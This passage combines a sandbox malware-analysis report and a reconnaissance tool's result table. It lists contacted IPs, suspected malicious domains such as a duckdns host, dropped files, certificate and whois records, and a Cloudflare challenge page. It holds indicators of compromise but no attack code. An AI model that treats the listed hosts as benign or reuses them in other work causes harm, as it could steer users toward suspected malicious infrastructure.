"Local\\InternetShortcutMutex"\n "Local\\SM0:7672:304:WilStaging_02"\n "Local\\SM0:7672:120:WilError_01"\n "Local\\SM0:7992:120:WilError_01"\n "Local\\SM0:7992:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8048:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.46.243:443"\n "142.250.189.14:443"\n "69.16.175.10:443"\n "142.251.46.212:443"\n "142.251.46.234:443"\n "142.250.191.67:443"\n "35.244.149.249:443"\n "142.251.32.33:443"\n "134.209.18.52:443"\n "104.17.24.14:443"\n "18.213.222.111:443"\n "34.148.97.127:443"\n "104.22.61.124:443"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "lihi2.cc"\n "releases.jquery.com"\n "userclient-maindeskamz6.duckdns.org"\n "www.cloudways.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows"), Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7992_869135203\\Part-RU]- [targetUID: 00000000-00007992]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) 
x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007992]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007992]\n "f_00023e" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007992]\n "706fd1a1-8b40-4bc6-bcf9-91551dfb6c00.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 11805"- Location: [%TEMP%\\706fd1a1-8b40-4bc6-bcf9-91551dfb6c00.tmp]- [targetUID: 00000000-00007992]\n "f_00023d" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007984]\n "1131927d-a60d-42de-bcc5-0f2ff1f19599.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "7f5c3e03-e3d9-4827-9689-97cf06d5cf28.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7f5c3e03-e3d9-4827-9689-97cf06d5cf28.tmp]- [targetUID: 00000000-00007992]\n "dbd20caf-f43b-40a4-89ba-11e5c4cf28c9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\dbd20caf-f43b-40a4-89ba-11e5c4cf28c9.tmp]- [targetUID: 00000000-00007992]\n "2295fc53-d7a2-464a-a8c5-f67c10386b59.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\2295fc53-d7a2-464a-a8c5-f67c10386b59.tmp]- 
[targetUID: 00000000-00007992]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005676]\n "13ecf884ff1581cb_0" has type "data"- [targetUID: N/A]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007992]\n "393a9751-d2fe-45b8-8e82-e58c32edcb4e.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\393a9751-d2fe-45b8-8e82-e58c32edcb4e.tmp]- [targetUID: 00000000-00007984]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007992]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7992_869135203\\Filtering Rules]- [targetUID: 00000000-00007992]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00007992]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\LOG]- [targetUID: 00000000-00007992]\n "Indexing in Progress" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.38\\Indexing in Progress]- [targetUID: 00000000-00007992]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://start.seitenatelier.ch/free/desk17/usa"\n Pattern match: "https://start.seitenatelier.ch"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "lihi2.cc"\n Heuristic match: "releases.jquery.com"\n Heuristic match: 
"userclient-maindeskamz6.duckdns.org"\n Pattern match: "www.cloudways.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random\n "www.cloudways.com" seems to be random'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7992_869135203\\adblock_snippet.js]- [targetUID: 00000000-00007992]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has 
type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7992_869135203\\Part-RU]- [targetUID: 00000000-00007992]'}, {u'category': u'Network Related', u'origin': u'File/Memory' | 34.148.97.127 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2082 | 172.67.168.252 |
| 2023-05-12 02:44:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | None None | battleb0t.xyz |
| 2023-05-12 02:54:00 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T02:04:48.515Z", "ip": "104.21.6.166", "location_updated_at": "2023-04-29T21:15:21.600075Z", "autonomous_system_updated_at": "2023-05-09T11:43:45.531739Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.proappsys.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-10T18:40:10.866976783Z"}, "cpcontacts.menuin.pe": {"record_type": "A", "resolved_at": "2023-03-24T20:44:33.512986421Z"}, "www.oldthdoo.xyz": {"record_type": "A", "resolved_at": "2022-09-26T19:11:07.076925735Z"}, "matrixeducatie.nl": {"record_type": "A", "resolved_at": "2023-05-03T04:09:23.480806956Z"}, "outimpivutinli.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:57:31.066836981Z"}, "dhcp.pro": {"record_type": "A", "resolved_at": "2023-04-07T20:54:25.762591525Z"}, "kennedy.br": {"record_type": "A", "resolved_at": "2023-04-28T12:51:47.804820047Z"}, "sufferwith.info": {"record_type": "A", "resolved_at": "2023-05-10T17:23:47.734514798Z"}, "eraliser.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:10.208194848Z"}, "www.jollygoodgames.com": {"record_type": "A", "resolved_at": "2023-05-07T14:57:18.867430647Z"}, "nzfortress.nz": {"record_type": "A", "resolved_at": "2022-12-07T17:06:16.407969123Z"}, "lorencic.net": {"record_type": "A", "resolved_at": "2023-04-27T21:11:28.873533314Z"}, "pesdatabase.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-05-08T21:46:48.198722317Z"}, "cdn-4.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-02T19:46:18.705684829Z"}, "reanorthcong.tk": {"record_type": "A", "resolved_at": "2023-04-04T23:08:50.029341555Z"}, "4wdinfo.com": 
{"record_type": "A", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-18T18:24:43.138880401Z"}, "account-dev.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-23T16:34:50.737558857Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "amg166.com": {"record_type": "A", "resolved_at": "2023-05-11T13:53:26.798801874Z"}, "alexricher.com": {"record_type": "A", "resolved_at": "2023-05-09T13:21:30.399313330Z"}, "48ln.com": {"record_type": "A", "resolved_at": "2023-05-08T13:20:43.893083983Z"}, "efnebacthydeda.cf": {"record_type": "A", "resolved_at": "2023-04-21T12:58:48.779910168Z"}, "usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-02T23:18:02.110883898Z"}, "backup.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.633015199Z"}, "osdronovacsiewy.tk": {"record_type": "A", "resolved_at": "2023-05-07T21:56:01.549731533Z"}, "www.kendalresearchgroup.eu.org": {"record_type": "A", "resolved_at": "2023-05-05T19:50:13.137718896Z"}, "wildanmaulana.cf": {"record_type": "A", "resolved_at": "2023-05-04T13:01:54.678346749Z"}, "cpcalendars.itauna.mg.gov.br": {"record_type": "A", "resolved_at": "2023-04-28T12:51:58.455556942Z"}, "obhkitchens.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T10:58:42.826529023Z"}, "www.bouncefitness.precisiongroup.com.au": {"record_type": "A", "resolved_at": "2023-04-26T12:25:18.625366391Z"}, "www.onedollarglasses.org": {"record_type": "A", "resolved_at": "2023-05-07T21:18:07.768786749Z"}, "www.seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "myschoolpoint.ca": {"record_type": "A", "resolved_at": "2023-05-06T12:57:35.437078256Z"}, "mitincderthesacom.tk": {"record_type": "A", 
"resolved_at": "2023-04-15T02:26:57.134312633Z"}, "kerzcoobamabasvio.cf": {"record_type": "A", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "apps.codiotic.com": {"record_type": "A", "resolved_at": "2023-05-06T14:35:31.397147978Z"}, "cdn.madeincanadadirectory.ca": {"record_type": "CNAME", "resolved_at": "2023-04-28T12:59:28.832256372Z"}, "www.usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-11T16:20:14.776067678Z"}, "prefahoutesraismac.ga": {"record_type": "A", "resolved_at": "2023-05-10T17:09:09.762399021Z"}, "datedei.ml": {"record_type": "A", "resolved_at": "2023-01-08T15:10:53.714814308Z"}, "tavernolaincanto.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-04-10T21:37:30.505399325Z"}, "isnulemati.tk": {"record_type": "A", "resolved_at": "2023-05-01T20:43:57.727814020Z"}, "hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-08T22:17:07.130263501Z"}, "api.sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-26T16:20:22.956402279Z"}, "zacaluzoo.com.au": {"record_type": "A", "resolved_at": "2023-05-02T19:19:57.060547173Z"}, "www.typearound.com": {"record_type": "A", "resolved_at": "2023-05-03T15:59:44.822944002Z"}, "ketitarechesjunc.tk": {"record_type": "A", "resolved_at": "2023-05-05T20:23:13.362328225Z"}, "totnewsgativime.ml": {"record_type": "A", "resolved_at": "2023-05-11T18:38:46.532739958Z"}, "tgtetv.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-11T19:57:47.589434167Z"}, "credegtetandbeasump.tk": {"record_type": "A", "resolved_at": "2023-04-13T20:24:22.673256350Z"}, "tgtetv.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.785914421Z"}, "enchocompnicha.tk": {"record_type": "A", "resolved_at": "2023-01-16T17:49:49.026447391Z"}, "manlopanficlle.tk": {"record_type": "A", "resolved_at": "2022-12-27T16:42:16.700640379Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "jagotekno.com": 
| 104.21.6.166 |
| 2023-05-12 02:44:33 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000.github.io |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 5 | 0 | None | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S. is a domain name registrar accredited by ICANN,
the international domain name registration authority.
It has no connection whatsoever with the content or publication of the website belonging to this domain name.
It only acts as an intermediary for the registration of the domain name within the framework of ICANN rules.
The information provided by the owner of this domain name at the time of registration is as shown above.
NICS Telekomunikasyon A.S. cannot guarantee the accuracy of this information.
For more information, you can write to info [at] nicproxy.com.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| keyubu.com |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 42 | 0 | 2 | 0 | None | 64.226.81.43 | kekw.battleb0t.xyz |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="fXRp0MT2Gq_7yIcIgnBHmz4mvl642t3xYxkCV5CopVU-1683861861-0-AevD5zHzR5Nylhg7VMHylWA-UGhfY5JI7t_DZKLajlY04sfvOKhEUvL9GVGicMZplZkcd7EKnpXCooBz_psnEdyw4NmTFN3sNXxO3b2NuDlfX3fgFqIYYwxN-_ZcrgInEcSdq4ze85lgbNjmAyI7cICej2859mTsNPJTSg3Eei4MCiIEepygARCAmXkyjazT_siRWXRbIF3Yq9cQrkKvTYHjy7kA4ARUBhj3gHLsfY6ByHmcA-4oH5F_BMaNFfn83ZbE-O4HF1luYDVMX4jN2SY5BFBmGirV5lQE7nc2ET_G_HywU7GlMXbT0JmkojLsvRDxpqP_ZBtz_vJHbi4FUOHHRaxbF6WI1ct7U2kIlltKjNHrBNnSQ1zRICZ4xPEiXCRFEqv1mvMk_vuWumbRs70YeoiNBWGJjw9SNPC0qRv0_rQzWEhzAZCr9GR45Pyn22x2UzlVIl478oJoBXIxbm7A_QBYYHzFjMNgE8pR4rE43z-LkzbfZp4Mrz4ipAVKmZJGkf2Y5B_9TlYOJXKMjDFy4LD0ELxkw1-R_QW_mLtVmznveG5c9m2IZ2zQV1cn4H8j5Bc1iY811MUNVsmFG0JD-DYsguU4LRfDkaOmbWCSaJ34wnyswYZY6vuAq7jQcIjqzclxyNRihA5I_cL6ueo4Ri5oVSncrTfIsWIYMESFPA-cZy_mtxt3SdM8IrciE1x1sYi06n9I6prGHl0s-4QNR7JVOnbdMoI28ES-j7HwNWZk4MsUxFuzUOsk5lSLsSRh-hQZxr19nktp-MvVpSzRUuSL26nuxNFkN8FTk5Ae96R-Z683yfnj1pOwmIp-ezEp2JWb8TkZZ0zoMJBnNWz-dER92U4KjRMwAWRs684SongNmPEIXYAgqclvfJ3msrReLNbVn2C0cz7wvPKboCqEwy5ipFMXgNiuhbJpqavDTbOw2pcmk4nLwQO7-0fq6lR-AioIh72_7f-dcCDyp3CvaV2lSxONdGbwSj69Uzxdx9pjqKiA7eKWgpDp1A1TT4OM1UPvdKoDNlfXS-kt53TGtcDj_tr5ZSCxVfBj5Eaq6vy-dzTe3un5fL0Jw93IdI7hmq3BtVNMvvG3ttwva1yDFbKbbzAoei-_xuiypX7ONnqllk5lT1u_-s9W-YqxnvXblOasj5xt36xai8HGELg30c69mi7dS6KFtoe8onnoqh_Jv5x6H6CEBPpBlJkQ-7Wml_gwi2q6d0tQ_ZdaaMoOXxHsxIyK5qGvyrxIKQoaob4JTcbfXfzc5V6fJoXtr9RSoGgPAroX9StxeMfnAcZJZ38lwB2R_OkZXBx7EFcRTvZsqwNSAcBE597i5gxzUV9OIg9fnTaoLIGC6pMfXSOrCdhVP4gGEX4Bccu5X10qZzo6Szn5JgpstSZeqAMVuU9TWGPYdK5uOwlHRiWmjX7UntfXmsGqJLQN_MyyArtIqHW_GuUvvub4g6fNvemcAOPIu9NS3HWmMTmUN4ACMa423i12vOJGRP7TcmceYbGSntTQh51WDUHuY7LdwoWtDpwMlk9-stOh87SR4LOrDyvW1iZRowgiTy2GmxHJlIHKCRhXnA5KaH4pnPJkKkhrPoRN6DTCQDr15qpBgZxUmF4wezI7yU8i7hxFvjA2vpTMuEjzuFK5Xab8ZS1nR5YLbQiKD3ROG0S6bl-4nxyf66OU-8Xv4FaugupxS3e-wlAwiX3hxmLNdGdmQn9eyC4_2RwUK2WWp5b7e4SAi9-pAVBzMefue3T2KHTLHF643icuFWjUauohcHM9aP5V8YQkXvauXJeiafKXSGCb142muLvzgJ9tWui0nHCx7aGYnZ5KCXJJAPsMf9OR8piOc-bOw90DQdaaAoQce9uq1wQGOtC7qhcYnC54DqDoEYzADwA9eHH9C
